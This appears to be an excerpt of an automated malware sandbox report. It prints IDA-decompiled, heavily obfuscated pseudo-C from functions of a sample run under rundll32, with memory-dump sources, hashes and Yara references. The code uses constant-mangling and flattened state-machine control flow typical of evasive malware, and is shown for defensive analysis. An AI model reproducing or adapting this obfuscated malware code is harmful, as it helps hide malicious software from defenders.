                                                                                                                          			E007A6C49(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v88;
				char _v608;
				void* _t92;
				void* _t96;
				void* _t101;
				void* _t112;
				void* _t113;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t92);
				_v52 = _v52 & 0x00000000;
				_v56 = 0x878462;
				_t113 = _t112 + 0x14;
				_v32 = 0x956791;
				_t101 = 0x1300659;
				_v32 = _v32 + 0xffff68af;
				_v32 = _v32 ^ 0x0094d050;
				_v48 = 0xb6c679;
				_v48 = _v48 * 9;
				_v48 = _v48 ^ 0x0662f925;
				_v16 = 0xd9c762;
				_v16 = _v16 << 1;
				_v16 = _v16 | 0xb4c78449;
				_v16 = _v16 ^ 0xb5f30401;
				_v40 = 0x8b331e;
				_v40 = _v40 >> 0xc;
				_v40 = _v40 ^ 0x000c5129;
				_v28 = 0x1269f4;
				_v28 = _v28 >> 4;
				_v28 = _v28 ^ 0x0007e996;
				_v44 = 0xabd705;
				_v44 = _v44 ^ 0x9c90d177;
				_v44 = _v44 ^ 0x9c3fe788;
				_v8 = 0x357d72;
				_v8 = _v8 + 0xd90c;
				_v8 = _v8 ^ 0xccfdbdcb;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x199e890f;
				_v12 = 0x32e6;
				_v12 = _v12 ^ 0x74a35607;
				_v12 = _v12 | 0x704b9008;
				_v12 = _v12 + 0xffff83aa;
				_v12 = _v12 ^ 0x74eee325;
				_v36 = 0xeddfb6;
				_v36 = _v36 << 0xa;
				_v36 = _v36 ^ 0xb77b8cf2;
				_v24 = 0xe2b758;
				_v24 = _v24 << 5;
				_v24 = _v24 * 0x38;
				_v24 = _v24 ^ 0x330719f5;
				_v20 = 0x9236d6;
				_v20 = _v20 | 0x3f0523f5;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 ^ 0x000835ca;
				do {
					while(_t101 != 0x1300659) {
						if(_t101 == 0xa264c44) {
							_t96 = E00799D31(_v40,  &_v608, _v28, _t101, _v44, _v8);
							_t113 = _t113 + 0x10;
							_t101 = 0xbcabc0e;
							continue;
						}
						if(_t101 != 0xbcabc0e) {
							goto L8;
						}
						return E007A6637( &_v88, _v12, _v36, _v24,  &_v608, _a12, _v20);
					}
					_t96 = E00794B61( &_v88, _v32, _v48, _v16);
					_t101 = 0xa264c44;
					L8:
				} while (_t101 != 0x478adce);
				return _t96;
			}























                                                                                                                          0x007a6c55
                                                                                                                          0x007a6c58
                                                                                                                          0x007a6c5b
                                                                                                                          0x007a6c5e
                                                                                                                          0x007a6c5f
                                                                                                                          0x007a6c60
                                                                                                                          0x007a6c65
                                                                                                                          0x007a6c6e
                                                                                                                          0x007a6c75
                                                                                                                          0x007a6c78
                                                                                                                          0x007a6c7f
                                                                                                                          0x007a6c81
                                                                                                                          0x007a6c8d
                                                                                                                          0x007a6c99
                                                                                                                          0x007a6ca4
                                                                                                                          0x007a6ca7
                                                                                                                          0x007a6cae
                                                                                                                          0x007a6cb5
                                                                                                                          0x007a6cb8
                                                                                                                          0x007a6cbf
                                                                                                                          0x007a6cc6
                                                                                                                          0x007a6ccd
                                                                                                                          0x007a6cd1
                                                                                                                          0x007a6cd8
                                                                                                                          0x007a6cdf
                                                                                                                          0x007a6ce3
                                                                                                                          0x007a6cea
                                                                                                                          0x007a6cf1
                                                                                                                          0x007a6cf8
                                                                                                                          0x007a6cff
                                                                                                                          0x007a6d06
                                                                                                                          0x007a6d0d
                                                                                                                          0x007a6d14
                                                                                                                          0x007a6d18
                                                                                                                          0x007a6d1f
                                                                                                                          0x007a6d26
                                                                                                                          0x007a6d2d
                                                                                                                          0x007a6d34
                                                                                                                          0x007a6d3b
                                                                                                                          0x007a6d42
                                                                                                                          0x007a6d49
                                                                                                                          0x007a6d4d
                                                                                                                          0x007a6d54
                                                                                                                          0x007a6d5b
                                                                                                                          0x007a6d63
                                                                                                                          0x007a6d66
                                                                                                                          0x007a6d6d
                                                                                                                          0x007a6d74
                                                                                                                          0x007a6d7b
                                                                                                                          0x007a6d7f
                                                                                                                          0x007a6d86
                                                                                                                          0x007a6d86
                                                                                                                          0x007a6d8c
                                                                                                                          0x007a6dcd
                                                                                                                          0x007a6dd2
                                                                                                                          0x007a6dd5
                                                                                                                          0x00000000
                                                                                                                          0x007a6dd5
                                                                                                                          0x007a6d90
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a6db0
                                                                                                                          0x007a6de5
                                                                                                                          0x007a6dec
                                                                                                                          0x007a6dee
                                                                                                                          0x007a6dee
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %t$DL&$r}5
                                                                                                                          • API String ID: 0-2337153543
                                                                                                                          • Opcode ID: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                          • Instruction ID: d3fe29aca99ae7adbcb365e3017bbf12104409cbb69dae960de1d7f86a1abc0a
                                                                                                                          • Opcode Fuzzy Hash: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                          • Instruction Fuzzy Hash: E8412371D0020EEBCF09DFE5D94A4EEBBB1FB48318F248198D51176260D3B94A59CFA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1003B8BC Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __decode_pointer.LIBCMT ref: 1003B8CA
                                                                                                                            • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350BB
                                                                                                                            • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350D2
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 1003B8D1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1958600898-0
                                                                                                                          • Opcode ID: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                          • Instruction ID: 13914855b6ed5f75d6cf868945e622cc1528c9e1cf50f9ea13f0b817109926cd
                                                                                                                          • Opcode Fuzzy Hash: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                          • Instruction Fuzzy Hash: 7FC08C388087C04FEB1AD3354D8C30D3E00E713301FC00488DC80D5053EE99410C8323
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A1889 Relevance: 2.8, Strings: 2, Instructions: 278COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E007A1889(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				short _v1564;
				intOrPtr _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _t323;
				signed int _t334;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				void* _t386;
				void* _t387;
				signed int* _t390;

				_t390 =  &_v1680;
				_v1568 = 0xdfec4c;
				_t386 = __ecx;
				_v1564 = 0;
				_t387 = 0xea1969c;
				_v1596 = 0xb94d4f;
				_v1596 = _v1596 >> 2;
				_v1596 = _v1596 ^ 0x002b88ba;
				_v1604 = 0x7820e8;
				_t9 =  &_v1604; // 0x7820e8
				_t337 = 0x3f;
				_v1604 =  *_t9 / _t337;
				_v1604 = _v1604 << 6;
				_v1604 = _v1604 ^ 0x0075b154;
				_v1676 = 0xd796f6;
				_v1676 = _v1676 << 7;
				_t338 = 0x1f;
				_v1676 = _v1676 / _t338;
				_v1676 = _v1676 | 0x34dfec15;
				_v1676 = _v1676 ^ 0x37fcd475;
				_v1580 = 0x701ced;
				_t339 = 0x3b;
				_v1580 = _v1580 / _t339;
				_v1580 = _v1580 ^ 0x000eda5b;
				_v1584 = 0x3864f;
				_v1584 = _v1584 | 0xebab6106;
				_v1584 = _v1584 ^ 0xeba3c8dc;
				_v1668 = 0x7d6229;
				_v1668 = _v1668 + 0x90f9;
				_t340 = 0x7d;
				_v1668 = _v1668 * 0xd;
				_v1668 = _v1668 + 0x17d6;
				_v1668 = _v1668 ^ 0x06671cb6;
				_v1652 = 0x8dafad;
				_v1652 = _v1652 + 0xffffa237;
				_v1652 = _v1652 / _t340;
				_v1652 = _v1652 ^ 0xeab94c45;
				_v1652 = _v1652 ^ 0xeabb4144;
				_v1620 = 0x364acf;
				_v1620 = _v1620 + 0xffffd559;
				_v1620 = _v1620 ^ 0x476b0832;
				_v1620 = _v1620 ^ 0x4757dcec;
				_v1660 = 0xdffac8;
				_v1660 = _v1660 | 0xd3f81aab;
				_t341 = 0xd;
				_v1660 = _v1660 / _t341;
				_v1660 = _v1660 + 0x2ca8;
				_v1660 = _v1660 ^ 0x10473906;
				_v1636 = 0xafa95;
				_v1636 = _v1636 | 0x12b9adda;
				_v1636 = _v1636 + 0xca30;
				_t342 = 0x24;
				_v1636 = _v1636 / _t342;
				_v1636 = _v1636 ^ 0x008bc8e6;
				_v1612 = 0xa1b06d;
				_v1612 = _v1612 ^ 0xd927b519;
				_t334 = 0x1c;
				_v1612 = _v1612 / _t334;
				_v1612 = _v1612 ^ 0x07c55aff;
				_v1628 = 0xe475d7;
				_v1628 = _v1628 + 0xf351;
				_v1628 = _v1628 >> 9;
				_v1628 = _v1628 ^ 0x000b149a;
				_v1644 = 0xc98f78;
				_v1644 = _v1644 + 0xa497;
				_v1644 = _v1644 + 0xab0a;
				_v1644 = _v1644 ^ 0x9916dffd;
				_v1644 = _v1644 ^ 0x99d32d23;
				_v1572 = 0xdb2c8b;
				_v1572 = _v1572 ^ 0xa2354bd4;
				_v1572 = _v1572 ^ 0xa2e9b3f6;
				_v1616 = 0x8ac290;
				_v1616 = _v1616 | 0xd6340cba;
				_t343 = 0x17;
				_v1616 = _v1616 / _t343;
				_v1616 = _v1616 ^ 0x095403ec;
				_v1624 = 0xc9b33;
				_v1624 = _v1624 | 0xadec2c36;
				_t344 = 0x23;
				_v1624 = _v1624 / _t344;
				_v1624 = _v1624 ^ 0x04f29945;
				_v1672 = 0xce6284;
				_t345 = 0x1b;
				_v1672 = _v1672 * 0x47;
				_v1672 = _v1672 >> 0xb;
				_v1672 = _v1672 | 0xab5418c0;
				_v1672 = _v1672 ^ 0xab589207;
				_v1680 = 0xfb4294;
				_v1680 = _v1680 * 0x56;
				_v1680 = _v1680 >> 0xe;
				_v1680 = _v1680 >> 4;
				_v1680 = _v1680 ^ 0x000a896c;
				_v1576 = 0xa0fe48;
				_v1576 = _v1576 / _t345;
				_v1576 = _v1576 ^ 0x000b8e8e;
				_v1608 = 0x915f33;
				_v1608 = _v1608 + 0xfa43;
				_v1608 = _v1608 >> 0xc;
				_v1608 = _v1608 ^ 0x000a30cc;
				_v1648 = 0x21b71b;
				_v1648 = _v1648 ^ 0x78ef874e;
				_v1648 = _v1648 | 0x9c246086;
				_v1648 = _v1648 * 0x4a;
				_v1648 = _v1648 ^ 0x1ce73be6;
				_v1592 = 0x926794;
				_v1592 = _v1592 + 0xffff6f6e;
				_v1592 = _v1592 ^ 0x009c0ed2;
				_v1656 = 0x919083;
				_v1656 = _v1656 / _t334;
				_v1656 = _v1656 >> 2;
				_t346 = 0x67;
				_v1656 = _v1656 / _t346;
				_v1656 = _v1656 ^ 0x0003c4fa;
				_v1664 = 0xb12839;
				_v1664 = _v1664 ^ 0xbcb8295e;
				_v1664 = _v1664 + 0xe70b;
				_v1664 = _v1664 + 0xffffbcc9;
				_v1664 = _v1664 ^ 0xbc0a928f;
				_v1600 = 0x37ff42;
				_v1600 = _v1600 + 0xffff03fd;
				_v1600 = _v1600 >> 3;
				_v1600 = _v1600 ^ 0x000f4750;
				_v1632 = 0xbb4856;
				_v1632 = _v1632 * 0x4e;
				_v1632 = _v1632 | 0xf74fdfff;
				_v1632 = _v1632 ^ 0xff54b7ec;
				_v1640 = 0x73c8d7;
				_v1640 = _v1640 * 0x56;
				_v1640 = _v1640 << 0xb;
				_v1640 = _v1640 >> 7;
				_v1640 = _v1640 ^ 0x005dc3ee;
				_v1588 = 0xe2f656;
				_t323 = _v1588 * 0x57;
				_v1588 = _t323;
				_v1588 = _v1588 ^ 0x4d200bca;
				while(_t387 != 0x5de06da) {
					if(_t387 == 0xea1969c) {
						_t387 = 0xfa9128f;
						continue;
					} else {
						_t395 = _t387 - 0xfa9128f;
						if(_t387 != 0xfa9128f) {
							L8:
							__eflags = _t387 - 0xa8e801c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E007ADA22(_v1596, _v1604, _t395, _v1676,  &_v1040, _t346, _v1580);
							 *((short*)(E0079B6CF( &_v1040, _v1584, _v1668, _v1652))) = 0;
							E00798969(_v1620,  &_v520, _t395, _v1660, _v1636);
							_push(_v1644);
							_push(_v1628);
							E007947CE( &_v1040, _v1572, _v1612, _v1616, _v1624, E007ADCF7(_v1612, 0x791328, _t395),  &_v520, _v1672, _v1680);
							E0079A8B0(_v1576, _t329, _v1608);
							_t346 = _v1648;
							_t323 = E0079EA99(_t346, _t386, _v1592, _v1656,  &_v1560, _v1664);
							_t390 =  &(_t390[0x17]);
							if(_t323 != 0) {
								_t387 = 0x5de06da;
								continue;
							}
						}
					}
					return _t323;
				}
				_push(_v1588);
				_push( &_v1560);
				_push(_t346);
				_push(0);
				_push(0);
				_push(_v1640);
				_t346 = _v1600;
				_push(0);
				_t323 = E0079AB87(_t346, _v1632, __eflags);
				_t390 =  &(_t390[7]);
				_t387 = 0xa8e801c;
				goto L8;
			}



















































                                                                                                                          0x007a1889
                                                                                                                          0x007a188f
                                                                                                                          0x007a18a1
                                                                                                                          0x007a18a3
                                                                                                                          0x007a18aa
                                                                                                                          0x007a18af
                                                                                                                          0x007a18b7
                                                                                                                          0x007a18bc
                                                                                                                          0x007a18c4
                                                                                                                          0x007a18cc
                                                                                                                          0x007a18d0
                                                                                                                          0x007a18d5
                                                                                                                          0x007a18db
                                                                                                                          0x007a18e0
                                                                                                                          0x007a18e8
                                                                                                                          0x007a18f0
                                                                                                                          0x007a18f9
                                                                                                                          0x007a18fe
                                                                                                                          0x007a1904
                                                                                                                          0x007a190c
                                                                                                                          0x007a1914
                                                                                                                          0x007a1920
                                                                                                                          0x007a1925
                                                                                                                          0x007a192b
                                                                                                                          0x007a1933
                                                                                                                          0x007a193b
                                                                                                                          0x007a1943
                                                                                                                          0x007a194b
                                                                                                                          0x007a1953
                                                                                                                          0x007a1960
                                                                                                                          0x007a1963
                                                                                                                          0x007a1967
                                                                                                                          0x007a196f
                                                                                                                          0x007a1977
                                                                                                                          0x007a197f
                                                                                                                          0x007a198f
                                                                                                                          0x007a1993
                                                                                                                          0x007a199b
                                                                                                                          0x007a19a3
                                                                                                                          0x007a19ab
                                                                                                                          0x007a19b3
                                                                                                                          0x007a19bb
                                                                                                                          0x007a19c3
                                                                                                                          0x007a19cb
                                                                                                                          0x007a19d7
                                                                                                                          0x007a19dc
                                                                                                                          0x007a19e2
                                                                                                                          0x007a19ea
                                                                                                                          0x007a19f2
                                                                                                                          0x007a19fa
                                                                                                                          0x007a1a02
                                                                                                                          0x007a1a0e
                                                                                                                          0x007a1a11
                                                                                                                          0x007a1a15
                                                                                                                          0x007a1a1f
                                                                                                                          0x007a1a27
                                                                                                                          0x007a1a35
                                                                                                                          0x007a1a3a
                                                                                                                          0x007a1a3e
                                                                                                                          0x007a1a46
                                                                                                                          0x007a1a4e
                                                                                                                          0x007a1a56
                                                                                                                          0x007a1a5b
                                                                                                                          0x007a1a63
                                                                                                                          0x007a1a6b
                                                                                                                          0x007a1a73
                                                                                                                          0x007a1a7b
                                                                                                                          0x007a1a83
                                                                                                                          0x007a1a8b
                                                                                                                          0x007a1a93
                                                                                                                          0x007a1a9b
                                                                                                                          0x007a1aa3
                                                                                                                          0x007a1aab
                                                                                                                          0x007a1ab9
                                                                                                                          0x007a1abe
                                                                                                                          0x007a1ac2
                                                                                                                          0x007a1aca
                                                                                                                          0x007a1ad2
                                                                                                                          0x007a1ae0
                                                                                                                          0x007a1ae5
                                                                                                                          0x007a1ae9
                                                                                                                          0x007a1af1
                                                                                                                          0x007a1b00
                                                                                                                          0x007a1b01
                                                                                                                          0x007a1b05
                                                                                                                          0x007a1b0a
                                                                                                                          0x007a1b12
                                                                                                                          0x007a1b1a
                                                                                                                          0x007a1b27
                                                                                                                          0x007a1b2b
                                                                                                                          0x007a1b30
                                                                                                                          0x007a1b35
                                                                                                                          0x007a1b3d
                                                                                                                          0x007a1b4d
                                                                                                                          0x007a1b51
                                                                                                                          0x007a1b59
                                                                                                                          0x007a1b61
                                                                                                                          0x007a1b69
                                                                                                                          0x007a1b6e
                                                                                                                          0x007a1b76
                                                                                                                          0x007a1b7e
                                                                                                                          0x007a1b86
                                                                                                                          0x007a1b93
                                                                                                                          0x007a1b97
                                                                                                                          0x007a1b9f
                                                                                                                          0x007a1ba7
                                                                                                                          0x007a1baf
                                                                                                                          0x007a1bb7
                                                                                                                          0x007a1bc5
                                                                                                                          0x007a1bc9
                                                                                                                          0x007a1bd6
                                                                                                                          0x007a1bde
                                                                                                                          0x007a1be2
                                                                                                                          0x007a1bea
                                                                                                                          0x007a1bf2
                                                                                                                          0x007a1bfa
                                                                                                                          0x007a1c02
                                                                                                                          0x007a1c0a
                                                                                                                          0x007a1c12
                                                                                                                          0x007a1c1a
                                                                                                                          0x007a1c22
                                                                                                                          0x007a1c27
                                                                                                                          0x007a1c2f
                                                                                                                          0x007a1c3c
                                                                                                                          0x007a1c40
                                                                                                                          0x007a1c48
                                                                                                                          0x007a1c50
                                                                                                                          0x007a1c5d
                                                                                                                          0x007a1c61
                                                                                                                          0x007a1c66
                                                                                                                          0x007a1c6b
                                                                                                                          0x007a1c73
                                                                                                                          0x007a1c7b
                                                                                                                          0x007a1c80
                                                                                                                          0x007a1c84
                                                                                                                          0x007a1c8c
                                                                                                                          0x007a1c9a
                                                                                                                          0x007a1d93
                                                                                                                          0x00000000
                                                                                                                          0x007a1ca0
                                                                                                                          0x007a1ca0
                                                                                                                          0x007a1ca6
                                                                                                                          0x007a1dc6
                                                                                                                          0x007a1dc6
                                                                                                                          0x007a1dcc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a1cac
                                                                                                                          0x007a1cc5
                                                                                                                          0x007a1cf6
                                                                                                                          0x007a1cfd
                                                                                                                          0x007a1d02
                                                                                                                          0x007a1d0b
                                                                                                                          0x007a1d4c
                                                                                                                          0x007a1d5e
                                                                                                                          0x007a1d7c
                                                                                                                          0x007a1d80
                                                                                                                          0x007a1d85
                                                                                                                          0x007a1d8a
                                                                                                                          0x007a1d8c
                                                                                                                          0x00000000
                                                                                                                          0x007a1d8c
                                                                                                                          0x007a1d8a
                                                                                                                          0x007a1ca6
                                                                                                                          0x007a1ddc
                                                                                                                          0x007a1ddc
                                                                                                                          0x007a1d9d
                                                                                                                          0x007a1da8
                                                                                                                          0x007a1da9
                                                                                                                          0x007a1daa
                                                                                                                          0x007a1dab
                                                                                                                          0x007a1dac
                                                                                                                          0x007a1db4
                                                                                                                          0x007a1db8
                                                                                                                          0x007a1db9
                                                                                                                          0x007a1dbe
                                                                                                                          0x007a1dc1
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: )b}$ x
                                                                                                                          • API String ID: 0-2724122486
                                                                                                                          • Opcode ID: b8cf03b1058855b61e12cf92aff27bfc11a27e8cd622279fc57111541d8365a4
                                                                                                                          • Instruction ID: 573749bd95757707c50caa6128a197bd72d7da7b824a0e8b030681fc7edafc92
                                                                                                                          • Opcode Fuzzy Hash: b8cf03b1058855b61e12cf92aff27bfc11a27e8cd622279fc57111541d8365a4
                                                                                                                          • Instruction Fuzzy Hash: 6FD1217250C3819FE368CF60C48A95BFBE2FBC5358F108A1DF29996260D7B58949CF42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A473C Relevance: 2.7, Strings: 2, Instructions: 233COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 99%
                                                                                                                          			E007A473C() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t218;
				signed int _t219;
				void* _t225;
				void* _t246;
				intOrPtr _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				intOrPtr _t258;
				intOrPtr* _t259;
				signed int _t260;
				signed int* _t261;

				_t261 =  &_v100;
				_v12 = 0xf244e3;
				_v8 = 0x291d6d;
				_t225 = 0x37f2dd7;
				_t251 = 0;
				_v4 = 0;
				_v68 = 0x555e8d;
				_v68 = _v68 + 0xfffff532;
				_v68 = _v68 | 0x235b50f0;
				_v68 = _v68 ^ 0x235e53ff;
				_v84 = 0xf72ec;
				_v84 = _v84 >> 7;
				_t252 = 0x19;
				_v84 = _v84 / _t252;
				_v84 = _v84 << 3;
				_v84 = _v84 ^ 0x000f09df;
				_v20 = 0xee8389;
				_t253 = 0x51;
				_v20 = _v20 * 0x29;
				_v20 = _v20 ^ 0x2635dc09;
				_v88 = 0xea545e;
				_t30 =  &_v88; // 0xea545e
				_v88 =  *_t30 / _t253;
				_t36 =  &_v88; // 0xea545e
				_t254 = 0x7a;
				_v88 =  *_t36 * 0x1c;
				_v88 = _v88 + 0xc9a8;
				_v88 = _v88 ^ 0x005db592;
				_v24 = 0x448750;
				_v24 = _v24 / _t254;
				_v24 = _v24 ^ 0x000cab3c;
				_v28 = 0x8cea36;
				_v28 = _v28 * 0x38;
				_v28 = _v28 ^ 0x1eda9ad9;
				_v100 = 0x8110ba;
				_v100 = _v100 + 0x3ab9;
				_v100 = _v100 ^ 0x336ca884;
				_v100 = _v100 + 0xffff8c66;
				_v100 = _v100 ^ 0x33e0711c;
				_v64 = 0x5ca85e;
				_v64 = _v64 >> 0x10;
				_v64 = _v64 * 0x4e;
				_v64 = _v64 ^ 0x000b11ab;
				_v44 = 0x2bb2b6;
				_v44 = _v44 | 0xbbfbcd5f;
				_v44 = _v44 ^ 0xbbf16182;
				_v72 = 0x855f4c;
				_v72 = _v72 ^ 0x87656771;
				_v72 = _v72 * 0x71;
				_v72 = _v72 ^ 0xf9f8e59a;
				_v96 = 0x938339;
				_v96 = _v96 << 8;
				_v96 = _v96 << 0xf;
				_v96 = _v96 ^ 0xcc040e17;
				_v96 = _v96 ^ 0x50841052;
				_v40 = 0xbe1d32;
				_v40 = _v40 + 0x9b9c;
				_v40 = _v40 ^ 0x00bc2d0e;
				_v56 = 0x9e5686;
				_v56 = _v56 + 0xffffd134;
				_v56 = _v56 + 0xffff1440;
				_v56 = _v56 ^ 0x0091c9b6;
				_v60 = 0xb7e614;
				_v60 = _v60 << 3;
				_v60 = _v60 >> 8;
				_v60 = _v60 ^ 0x00065aea;
				_v32 = 0x537989;
				_v32 = _v32 + 0xffff7fce;
				_v32 = _v32 ^ 0x005430a6;
				_v92 = 0x1586eb;
				_t255 = 0x27;
				_v92 = _v92 * 0x18;
				_v92 = _v92 >> 7;
				_v92 = _v92 * 0x26;
				_v92 = _v92 ^ 0x009f543a;
				_v52 = 0xc32f0b;
				_v52 = _v52 | 0xcd8d244f;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0cd427c3;
				_v36 = 0xd9cf6a;
				_v36 = _v36 / _t255;
				_v36 = _v36 ^ 0x000f5a1a;
				_v16 = 0xbb623f;
				_v16 = _v16 ^ 0xe760556d;
				_v16 = _v16 ^ 0xe7dfff62;
				_v76 = 0x7fa35c;
				_v76 = _v76 >> 0xa;
				_v76 = _v76 + 0xffff049d;
				_v76 = _v76 ^ 0x38c60922;
				_v76 = _v76 ^ 0xc73f93c8;
				_v80 = 0x34ea16;
				_v80 = _v80 | 0x70dfffff;
				_t256 = 0x78;
				_t257 = _v16;
				_t260 = _v16;
				_t224 = _v16;
				_v80 = _v80 / _t256;
				_v80 = _v80 ^ 0x00f0b2be;
				_v48 = 0x2ab377;
				_v48 = _v48 << 0xd;
				_v48 = _v48 + 0x21bb;
				_v48 = _v48 ^ 0x5663e2ae;
				while(1) {
					L1:
					_push(0x5c);
					while(_t225 != 0xb8820d) {
						if(_t225 == 0x1effdba) {
							_t219 = E0079912C(_v84, _v20, _t225, _v88, _t225, _v24, _v28);
							_t224 = _t219;
							_t261 =  &(_t261[5]);
							if(_t219 != 0) {
								_t225 = 0xb9a00d9;
								goto L11;
							}
						} else {
							if(_t225 == 0x37f2dd7) {
								_t225 = 0x43cb3ac;
								continue;
							} else {
								if(_t225 == 0x43cb3ac) {
									_t258 =  *0x7b3e10; // 0x0
									_t259 = _t258 + 0x1c;
									while( *_t259 != _t246) {
										_t259 = _t259 + 2;
									}
									_t257 = _t259 + 2;
									_t225 = 0x1effdba;
									goto L12;
								} else {
									if(_t225 == 0x5d9bea5) {
										E007A8F9E(_v32, _v92, _v52, _v36, _t260);
										_t261 =  &(_t261[3]);
										_t225 = 0xb8820d;
										goto L11;
									} else {
										if(_t225 == _t218) {
											E0079E249(_v96, _t260, _v40, _v56, _v60);
											_t261 =  &(_t261[3]);
											_t251 =  !=  ? 1 : _t251;
											_t225 = 0x5d9bea5;
											L11:
											_t246 = 0x5c;
											L12:
											_t218 = 0x9850ebe;
											continue;
										} else {
											if(_t225 != 0xb9a00d9) {
												L22:
												if(_t225 != 0x8a80d0f) {
													continue;
												}
											} else {
												_t260 = E007942C4(_v100, _t224, _v64, _v68, _t257, _v44, _v72);
												_t261 =  &(_t261[5]);
												_t218 = 0x9850ebe;
												_t225 =  !=  ? 0x9850ebe : 0xb8820d;
												goto L1;
											}
										}
									}
								}
							}
						}
						return _t251;
					}
					E007A8F9E(_v16, _v76, _v80, _v48, _t224);
					_t261 =  &(_t261[3]);
					_t225 = 0x8a80d0f;
					_t218 = 0x9850ebe;
					_t246 = 0x5c;
					goto L22;
				}
			}











































                                                                                                                          0x007a473c
                                                                                                                          0x007a473f
                                                                                                                          0x007a4749
                                                                                                                          0x007a4751
                                                                                                                          0x007a475a
                                                                                                                          0x007a475c
                                                                                                                          0x007a4760
                                                                                                                          0x007a4768
                                                                                                                          0x007a4770
